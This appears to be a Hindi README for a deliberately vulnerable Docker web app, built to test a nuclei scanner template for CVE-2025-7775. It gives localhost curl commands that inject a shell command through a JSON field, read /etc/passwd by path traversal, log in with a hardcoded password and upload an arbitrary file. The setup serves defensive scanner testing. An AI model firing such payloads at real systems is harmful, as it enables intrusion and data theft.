
कमजोर डॉकराइज़्ड वेब ऐप जो RCE, पाथ ट्रैवर्सल, हार्डकोडेड क्रेडेंशियल्स और असुरक्षित फ़ाइल अपलोड को उजागर करता है; सुरक्षा स्कैनर टेम्पलेट्स के परीक्षण के लिए एक पृथक लैब।
यह रिपॉजिटरी CVE-2025-7775 के लिए nuclei टेम्पलेट का परीक्षण करने हेतु एक संवेदनशील सेटअप प्रदान करती है।
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app
curl -X POST http://localhost:5000/api/v1/configuration \
-H "Content-Type: application/json" \
-d '{"payload":"ls > /tmp/poc_rce.txt"}'
docker exec -it vuln-test cat /tmp/poc_rce.txt
curl "http://localhost:5000/download?file=/etc/passwd"
curl -X POST http://localhost:5000/api/v1/login \
-H "Content-Type: application/json" \
-d '{"username":"admin", "password":"citrix123"}'
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app